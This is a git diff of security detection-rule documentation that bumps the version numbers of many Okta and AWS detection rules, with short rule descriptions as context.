ID: T1053.002 +** Reference URL: https://attack.mitre.org/techniques/T1053/002/ +* Sub-technique: ** Name: Scheduled Task ** ID: T1053.005 ** Reference URL: https://attack.mitre.org/techniques/T1053/005/ diff --git a/docs/detections/prebuilt-rules/rule-details/attempt-to-create-okta-api-token.asciidoc b/docs/detections/prebuilt-rules/rule-details/attempt-to-create-okta-api-token.asciidoc index bad38b1bb5..018da007f4 100644 --- a/docs/detections/prebuilt-rules/rule-details/attempt-to-create-okta-api-token.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/attempt-to-create-okta-api-token.asciidoc @@ -32,7 +32,7 @@ Detects attempts to create an Okta API token. An adversary may create an Okta AP * Data Source: Okta * Tactic: Persistence -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/attempt-to-deactivate-an-okta-application.asciidoc b/docs/detections/prebuilt-rules/rule-details/attempt-to-deactivate-an-okta-application.asciidoc index 898503d223..33e2435bfb 100644 --- a/docs/detections/prebuilt-rules/rule-details/attempt-to-deactivate-an-okta-application.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/attempt-to-deactivate-an-okta-application.asciidoc @@ -33,7 +33,7 @@ Detects attempts to deactivate an Okta application. An adversary may attempt to * Data Source: Okta * Tactic: Impact -*Version*: 105 +*Version*: 206 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/attempt-to-deactivate-an-okta-network-zone.asciidoc b/docs/detections/prebuilt-rules/rule-details/attempt-to-deactivate-an-okta-network-zone.asciidoc index b52414b13d..a7df47b956 100644 --- a/docs/detections/prebuilt-rules/rule-details/attempt-to-deactivate-an-okta-network-zone.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/attempt-to-deactivate-an-okta-network-zone.asciidoc @@ -34,7 +34,7 @@ Detects attempts to deactivate an Okta network zone. Okta network zones can be c * Use Case: Network Security Monitoring * Tactic: Defense Evasion -*Version*: 105 +*Version*: 206 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/attempt-to-deactivate-an-okta-policy-rule.asciidoc b/docs/detections/prebuilt-rules/rule-details/attempt-to-deactivate-an-okta-policy-rule.asciidoc index c9b37d2eb4..37ed4ddd5c 100644 --- a/docs/detections/prebuilt-rules/rule-details/attempt-to-deactivate-an-okta-policy-rule.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/attempt-to-deactivate-an-okta-policy-rule.asciidoc @@ -33,7 +33,7 @@ Detects attempts to deactivate a rule within an Okta policy. An adversary may at * Tactic: Defense Evasion * Data Source: Okta -*Version*: 106 +*Version*: 207 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/attempt-to-deactivate-an-okta-policy.asciidoc b/docs/detections/prebuilt-rules/rule-details/attempt-to-deactivate-an-okta-policy.asciidoc index 0f1f8602bd..fa96944dcd 100644 --- a/docs/detections/prebuilt-rules/rule-details/attempt-to-deactivate-an-okta-policy.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/attempt-to-deactivate-an-okta-policy.asciidoc @@ -33,7 +33,7 @@ Detects attempts to deactivate an Okta policy. An adversary may attempt to deact * Data Source: Okta * Tactic: Defense Evasion -*Version*: 105 +*Version*: 206 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/attempt-to-deactivate-mfa-for-an-okta-user-account.asciidoc b/docs/detections/prebuilt-rules/rule-details/attempt-to-deactivate-mfa-for-an-okta-user-account.asciidoc index 087e22d5a3..1f9a7dda8d 100644 --- a/docs/detections/prebuilt-rules/rule-details/attempt-to-deactivate-mfa-for-an-okta-user-account.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/attempt-to-deactivate-mfa-for-an-okta-user-account.asciidoc @@ -32,7 +32,7 @@ Detects attempts to deactivate multi-factor authentication (MFA) for an Okta use * Use Case: Identity and Access Audit * Data Source: Okta -*Version*: 105 +*Version*: 206 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/attempt-to-delete-an-okta-application.asciidoc b/docs/detections/prebuilt-rules/rule-details/attempt-to-delete-an-okta-application.asciidoc index dea09d6610..7c839d306b 100644 --- a/docs/detections/prebuilt-rules/rule-details/attempt-to-delete-an-okta-application.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/attempt-to-delete-an-okta-application.asciidoc @@ -32,7 +32,7 @@ Detects attempts to delete an Okta application. An adversary may attempt to modi * Data Source: Okta * Tactic: Impact -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/attempt-to-delete-an-okta-network-zone.asciidoc b/docs/detections/prebuilt-rules/rule-details/attempt-to-delete-an-okta-network-zone.asciidoc index 16cbe20f29..45b842e9dc 100644 --- a/docs/detections/prebuilt-rules/rule-details/attempt-to-delete-an-okta-network-zone.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/attempt-to-delete-an-okta-network-zone.asciidoc @@ -34,7 +34,7 @@ Detects attempts to delete an Okta network zone. Okta network zones can be confi * Use Case: Network Security Monitoring * Tactic: Defense Evasion -*Version*: 105 +*Version*: 206 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/attempt-to-delete-an-okta-policy-rule.asciidoc b/docs/detections/prebuilt-rules/rule-details/attempt-to-delete-an-okta-policy-rule.asciidoc index 537facfad0..e3335aabdd 100644 --- a/docs/detections/prebuilt-rules/rule-details/attempt-to-delete-an-okta-policy-rule.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/attempt-to-delete-an-okta-policy-rule.asciidoc @@ -33,7 +33,7 @@ Detects attempts to delete a rule within an Okta policy. An adversary may attemp * Data Source: Okta * Tactic: Defense Evasion -*Version*: 105 +*Version*: 206 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/attempt-to-delete-an-okta-policy.asciidoc b/docs/detections/prebuilt-rules/rule-details/attempt-to-delete-an-okta-policy.asciidoc index 5c630f5786..5d7cf3fb7d 100644 --- a/docs/detections/prebuilt-rules/rule-details/attempt-to-delete-an-okta-policy.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/attempt-to-delete-an-okta-policy.asciidoc @@ -33,7 +33,7 @@ Detects attempts to delete an Okta policy. An adversary may attempt to delete an * Data Source: Okta * Tactic: Defense Evasion -*Version*: 105 +*Version*: 206 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/attempt-to-disable-iptables-or-firewall.asciidoc b/docs/detections/prebuilt-rules/rule-details/attempt-to-disable-iptables-or-firewall.asciidoc index 3f7ff4da23..3700dab8e7 100644 --- a/docs/detections/prebuilt-rules/rule-details/attempt-to-disable-iptables-or-firewall.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/attempt-to-disable-iptables-or-firewall.asciidoc @@ -29,7 +29,7 @@ Adversaries may attempt to disable the iptables or firewall service in an attemp * Tactic: Defense Evasion * Data Source: Elastic Defend -*Version*: 3 +*Version*: 4 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/attempt-to-disable-syslog-service.asciidoc b/docs/detections/prebuilt-rules/rule-details/attempt-to-disable-syslog-service.asciidoc index 1a89e7c55c..5a81841dcd 100644 --- a/docs/detections/prebuilt-rules/rule-details/attempt-to-disable-syslog-service.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/attempt-to-disable-syslog-service.asciidoc @@ -32,7 +32,7 @@ Adversaries may attempt to disable the syslog service in an attempt to an attemp * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/attempt-to-modify-an-okta-application.asciidoc b/docs/detections/prebuilt-rules/rule-details/attempt-to-modify-an-okta-application.asciidoc index 20a3ee1150..574efdc398 100644 --- a/docs/detections/prebuilt-rules/rule-details/attempt-to-modify-an-okta-application.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/attempt-to-modify-an-okta-application.asciidoc @@ -33,7 +33,7 @@ Detects attempts to modify an Okta application. An adversary may attempt to modi * Data Source: Okta * Tactic: Impact -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/attempt-to-modify-an-okta-network-zone.asciidoc b/docs/detections/prebuilt-rules/rule-details/attempt-to-modify-an-okta-network-zone.asciidoc index b51a31959e..3502233fad 100644 --- a/docs/detections/prebuilt-rules/rule-details/attempt-to-modify-an-okta-network-zone.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/attempt-to-modify-an-okta-network-zone.asciidoc @@ -34,7 +34,7 @@ Detects attempts to modify an Okta network zone. Okta network zones can be confi * Use Case: Network Security Monitoring * Tactic: Defense Evasion -*Version*: 105 +*Version*: 206 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/attempt-to-modify-an-okta-policy-rule.asciidoc b/docs/detections/prebuilt-rules/rule-details/attempt-to-modify-an-okta-policy-rule.asciidoc index 95b8e63743..d07bfb897c 100644 --- a/docs/detections/prebuilt-rules/rule-details/attempt-to-modify-an-okta-policy-rule.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/attempt-to-modify-an-okta-policy-rule.asciidoc @@ -33,7 +33,7 @@ Detects attempts to modify a rule within an Okta policy. An adversary may attemp * Tactic: Defense Evasion * Data Source: Okta -*Version*: 106 +*Version*: 207 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/attempt-to-modify-an-okta-policy.asciidoc b/docs/detections/prebuilt-rules/rule-details/attempt-to-modify-an-okta-policy.asciidoc index 402017c624..67b47c287b 100644 --- a/docs/detections/prebuilt-rules/rule-details/attempt-to-modify-an-okta-policy.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/attempt-to-modify-an-okta-policy.asciidoc @@ -32,7 +32,7 @@ Detects attempts to modify an Okta policy. An adversary may attempt to modify an * Data Source: Okta * Tactic: Defense Evasion -*Version*: 105 +*Version*: 206 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/attempt-to-reset-mfa-factors-for-an-okta-user-account.asciidoc b/docs/detections/prebuilt-rules/rule-details/attempt-to-reset-mfa-factors-for-an-okta-user-account.asciidoc index ed1140b3ff..d8145ce50e 100644 --- a/docs/detections/prebuilt-rules/rule-details/attempt-to-reset-mfa-factors-for-an-okta-user-account.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/attempt-to-reset-mfa-factors-for-an-okta-user-account.asciidoc @@ -32,7 +32,7 @@ Detects attempts to reset an Okta user's enrolled multi-factor authentication (M * Use Case: Identity and Access Audit * Data Source: Okta -*Version*: 105 +*Version*: 206 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/attempt-to-revoke-okta-api-token.asciidoc b/docs/detections/prebuilt-rules/rule-details/attempt-to-revoke-okta-api-token.asciidoc index dc732bbc73..188fcadad4 100644 --- a/docs/detections/prebuilt-rules/rule-details/attempt-to-revoke-okta-api-token.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/attempt-to-revoke-okta-api-token.asciidoc @@ -32,7 +32,7 @@ Identifies attempts to revoke an Okta API token. An adversary may attempt to rev * Data Source: Okta * Tactic: Impact -*Version*: 105 +*Version*: 206 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/attempted-bypass-of-okta-mfa.asciidoc b/docs/detections/prebuilt-rules/rule-details/attempted-bypass-of-okta-mfa.asciidoc index 7bdf44c375..a827aebf32 100644 --- a/docs/detections/prebuilt-rules/rule-details/attempted-bypass-of-okta-mfa.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/attempted-bypass-of-okta-mfa.asciidoc @@ -32,7 +32,7 @@ Detects attempts to bypass Okta multi-factor authentication (MFA). An adversary * Use Case: Identity and Access Audit * Tactic: Credential Access -*Version*: 106 +*Version*: 207 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/attempts-to-brute-force-an-okta-user-account.asciidoc b/docs/detections/prebuilt-rules/rule-details/attempts-to-brute-force-an-okta-user-account.asciidoc index 8f1c202738..8cbfc09e3a 100644 --- a/docs/detections/prebuilt-rules/rule-details/attempts-to-brute-force-an-okta-user-account.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/attempts-to-brute-force-an-okta-user-account.asciidoc @@ -32,7 +32,7 @@ Identifies when an Okta user account is locked out 3 times within a 3 hour windo * Tactic: Credential Access * Data Source: Okta -*Version*: 106 +*Version*: 207 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-cloudtrail-log-created.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-cloudtrail-log-created.asciidoc index b1335b27fc..a07323325e 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-cloudtrail-log-created.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-cloudtrail-log-created.asciidoc @@ -33,7 +33,7 @@ Identifies the creation of an AWS log trail that specifies the settings for deli * Use Case: Log Auditing * Tactic: Collection -*Version*: 105 +*Version*: 206 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-cloudtrail-log-deleted.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-cloudtrail-log-deleted.asciidoc index 6d14f0dab7..1101846b83 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-cloudtrail-log-deleted.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-cloudtrail-log-deleted.asciidoc @@ -34,7 +34,7 @@ Identifies the deletion of an AWS log trail. An adversary may delete trails in a * Resources: Investigation Guide * Tactic: Defense Evasion -*Version*: 107 +*Version*: 208 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-cloudtrail-log-suspended.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-cloudtrail-log-suspended.asciidoc index b4c7e377d8..180831ac5b 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-cloudtrail-log-suspended.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-cloudtrail-log-suspended.asciidoc @@ -34,7 +34,7 @@ Identifies suspending the recording of AWS API calls and log file delivery for t * Resources: Investigation Guide * Tactic: Defense Evasion -*Version*: 107 +*Version*: 208 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-cloudtrail-log-updated.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-cloudtrail-log-updated.asciidoc index 3933af3e27..48da7776ca 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-cloudtrail-log-updated.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-cloudtrail-log-updated.asciidoc @@ -34,7 +34,7 @@ Identifies an update to an AWS log trail setting that specifies the delivery of * Resources: Investigation Guide * Tactic: Impact -*Version*: 107 +*Version*: 208 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-cloudwatch-alarm-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-cloudwatch-alarm-deletion.asciidoc index 587e1c9713..78c56cf933 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-cloudwatch-alarm-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-cloudwatch-alarm-deletion.asciidoc @@ -33,7 +33,7 @@ Identifies the deletion of an AWS CloudWatch alarm. An adversary may delete alar * Resources: Investigation Guide * Tactic: Defense Evasion -*Version*: 107 +*Version*: 208 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-cloudwatch-log-group-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-cloudwatch-log-group-deletion.asciidoc index a68e9eec1f..f1057330e7 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-cloudwatch-log-group-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-cloudwatch-log-group-deletion.asciidoc @@ -34,7 +34,7 @@ Identifies the deletion of a specified AWS CloudWatch log group. When a log grou * Resources: Investigation Guide * Tactic: Impact -*Version*: 107 +*Version*: 208 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-cloudwatch-log-stream-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-cloudwatch-log-stream-deletion.asciidoc index f380f44fad..7c5151dfbb 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-cloudwatch-log-stream-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-cloudwatch-log-stream-deletion.asciidoc @@ -34,7 +34,7 @@ Identifies the deletion of an AWS CloudWatch log stream, which permanently delet * Tactic: Impact * Resources: Investigation Guide -*Version*: 107 +*Version*: 208 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-config-resource-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-config-resource-deletion.asciidoc index 558eb1ddc4..4fb0f0813b 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-config-resource-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-config-resource-deletion.asciidoc @@ -33,7 +33,7 @@ Identifies attempts to delete an AWS Config Service resource. An adversary may t * Resources: Investigation Guide * Tactic: Defense Evasion -*Version*: 107 +*Version*: 208 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-configuration-recorder-stopped.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-configuration-recorder-stopped.asciidoc index 59cee7c169..c40ff55ddd 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-configuration-recorder-stopped.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-configuration-recorder-stopped.asciidoc @@ -32,7 +32,7 @@ Identifies an AWS configuration change to stop recording a designated set of res * Data Source: Amazon Web Services * Tactic: Defense Evasion -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-deletion-of-rds-instance-or-cluster.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-deletion-of-rds-instance-or-cluster.asciidoc index b74fbb50f7..31ede4dc18 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-deletion-of-rds-instance-or-cluster.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-deletion-of-rds-instance-or-cluster.asciidoc @@ -37,7 +37,7 @@ Identifies the deletion of an Amazon Relational Database Service (RDS) Aurora da * Use Case: Asset Visibility * Tactic: Impact -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-ec2-encryption-disabled.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-ec2-encryption-disabled.asciidoc index 159b1fa5db..abb6999466 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-ec2-encryption-disabled.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-ec2-encryption-disabled.asciidoc @@ -33,7 +33,7 @@ Identifies disabling of Amazon Elastic Block Store (EBS) encryption by default i * Data Source: Amazon Web Services * Tactic: Impact -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-ec2-full-network-packet-capture-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-ec2-full-network-packet-capture-detected.asciidoc index 5d46450abd..797aa13b14 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-ec2-full-network-packet-capture-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-ec2-full-network-packet-capture-detected.asciidoc @@ -34,7 +34,7 @@ Identifies potential Traffic Mirroring in an Amazon Elastic Compute Cloud (EC2) * Tactic: Exfiltration * Tactic: Collection -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-ec2-network-access-control-list-creation.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-ec2-network-access-control-list-creation.asciidoc index 75a99db214..cb045eb6d5 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-ec2-network-access-control-list-creation.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-ec2-network-access-control-list-creation.asciidoc @@ -35,7 +35,7 @@ Identifies the creation of an AWS Elastic Compute Cloud (EC2) network access con * Use Case: Network Security Monitoring * Tactic: Persistence -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-ec2-network-access-control-list-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-ec2-network-access-control-list-deletion.asciidoc index e0d8e0d825..c3f23b0bec 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-ec2-network-access-control-list-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-ec2-network-access-control-list-deletion.asciidoc @@ -35,7 +35,7 @@ Identifies the deletion of an Amazon Elastic Compute Cloud (EC2) network access * Use Case: Network Security Monitoring * Tactic: Defense Evasion -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-ec2-snapshot-activity.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-ec2-snapshot-activity.asciidoc index fb0aee9fd7..2efd8eb714 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-ec2-snapshot-activity.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-ec2-snapshot-activity.asciidoc @@ -34,7 +34,7 @@ An attempt was made to modify AWS EC2 snapshot attributes. Snapshots are sometim * Tactic: Exfiltration * Resources: Investigation Guide -*Version*: 107 +*Version*: 208 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-ec2-vm-export-failure.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-ec2-vm-export-failure.asciidoc index f60b391344..cc36bf6ad5 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-ec2-vm-export-failure.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-ec2-vm-export-failure.asciidoc @@ -33,7 +33,7 @@ Identifies an attempt to export an AWS EC2 instance. A virtual machine (VM) expo * Tactic: Exfiltration * Tactic: Collection -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-efs-file-system-or-mount-deleted.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-efs-file-system-or-mount-deleted.asciidoc index b781126fd2..e5b98eb398 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-efs-file-system-or-mount-deleted.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-efs-file-system-or-mount-deleted.asciidoc @@ -32,7 +32,7 @@ Detects when an EFS File System or Mount is deleted. An adversary could break an * Data Source: Amazon Web Services * Tactic: Impact -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-elasticache-security-group-created.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-elasticache-security-group-created.asciidoc index ceee6c2902..8ba3d86c1e 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-elasticache-security-group-created.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-elasticache-security-group-created.asciidoc @@ -31,7 +31,7 @@ Identifies when an ElastiCache security group has been created. * Data Source: Amazon Web Services * Tactic: Defense Evasion -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-elasticache-security-group-modified-or-deleted.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-elasticache-security-group-modified-or-deleted.asciidoc index 3d416d9b3c..2a24a6de94 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-elasticache-security-group-modified-or-deleted.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-elasticache-security-group-modified-or-deleted.asciidoc @@ -31,7 +31,7 @@ Identifies when an ElastiCache security group has been modified or deleted. * Data Source: Amazon Web Services * Tactic: Defense Evasion -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-eventbridge-rule-disabled-or-deleted.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-eventbridge-rule-disabled-or-deleted.asciidoc index 951cdd4ed3..169ded4b69 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-eventbridge-rule-disabled-or-deleted.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-eventbridge-rule-disabled-or-deleted.asciidoc @@ -32,7 +32,7 @@ Identifies when a user has disabled or deleted an EventBridge rule. This activit * Data Source: Amazon Web Services * Tactic: Impact -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-execution-via-system-manager.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-execution-via-system-manager.asciidoc index cd6af3d3af..5a16856614 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-execution-via-system-manager.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-execution-via-system-manager.asciidoc @@ -33,7 +33,7 @@ Identifies the execution of commands and scripts via System Manager. Execution m * Tactic: Initial Access * Resources: Investigation Guide -*Version*: 107 +*Version*: 208 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-guardduty-detector-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-guardduty-detector-deletion.asciidoc index 4333c226fa..27eb953909 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-guardduty-detector-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-guardduty-detector-deletion.asciidoc @@ -32,7 +32,7 @@ Identifies the deletion of an Amazon GuardDuty detector. Upon deletion, GuardDut * Data Source: Amazon Web Services * Tactic: Defense Evasion -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-iam-assume-role-policy-update.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-iam-assume-role-policy-update.asciidoc index 885fd99a57..5837358d87 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-iam-assume-role-policy-update.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-iam-assume-role-policy-update.asciidoc @@ -33,7 +33,7 @@ Identifies attempts to modify an AWS IAM Assume Role Policy. An adversary may at * Resources: Investigation Guide * Tactic: Privilege Escalation -*Version*: 107 +*Version*: 208 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-iam-brute-force-of-assume-role-policy.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-iam-brute-force-of-assume-role-policy.asciidoc index 8e6ba0e4e1..292637d671 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-iam-brute-force-of-assume-role-policy.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-iam-brute-force-of-assume-role-policy.asciidoc @@ -34,7 +34,7 @@ Identifies a high number of failed attempts to assume an AWS Identity and Access * Resources: Investigation Guide * Tactic: Credential Access -*Version*: 107 +*Version*: 208 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-iam-deactivation-of-mfa-device.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-iam-deactivation-of-mfa-device.asciidoc index 3a9868d3f1..b393f6b4f2 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-iam-deactivation-of-mfa-device.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-iam-deactivation-of-mfa-device.asciidoc @@ -33,7 +33,7 @@ Identifies the deactivation of a specified multi-factor authentication (MFA) dev * Resources: Investigation Guide * Tactic: Impact -*Version*: 107 +*Version*: 208 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-iam-group-creation.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-iam-group-creation.asciidoc index 61854b3e1b..1e9af572ef 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-iam-group-creation.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-iam-group-creation.asciidoc @@ -33,7 +33,7 @@ Identifies the creation of a group in AWS Identity and Access Management (IAM). * Use Case: Identity and Access Audit * Tactic: Persistence -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-iam-group-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-iam-group-deletion.asciidoc index 3287206e82..68b0e124bc 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-iam-group-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-iam-group-deletion.asciidoc @@ -32,7 +32,7 @@ Identifies the deletion of a specified AWS Identity and Access Management (IAM) * Data Source: Amazon Web Services * Tactic: Impact -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-iam-password-recovery-requested.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-iam-password-recovery-requested.asciidoc index 605d4f90bd..5a93c59a62 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-iam-password-recovery-requested.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-iam-password-recovery-requested.asciidoc @@ -32,7 +32,7 @@ Identifies AWS IAM password recovery requests. An adversary may attempt to gain * Use Case: Identity and Access Audit * Tactic: Initial Access -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-iam-user-addition-to-group.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-iam-user-addition-to-group.asciidoc index cd718d5266..79c3de8735 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-iam-user-addition-to-group.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-iam-user-addition-to-group.asciidoc @@ -34,7 +34,7 @@ Identifies the addition of a user to a specified group in AWS Identity and Acces * Tactic: Persistence * Resources: Investigation Guide -*Version*: 107 +*Version*: 208 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-kms-customer-managed-key-disabled-or-scheduled-for-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-kms-customer-managed-key-disabled-or-scheduled-for-deletion.asciidoc index 5dfc8ee291..8c9865e19e 100644 --- 